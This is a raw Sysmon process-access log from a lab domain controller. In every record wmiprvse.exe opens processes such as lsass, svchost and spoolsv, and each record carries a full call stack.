15:59:34.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025996Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025995Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025994Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025993Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025992Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025991Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025990Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025989Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025988Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025987Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025986Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025985Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.178{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025984Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.178{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025983Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.178{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025982Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.178{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025981Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.178{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025980Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.178{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025979Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.178{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025978Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.178{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025977Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 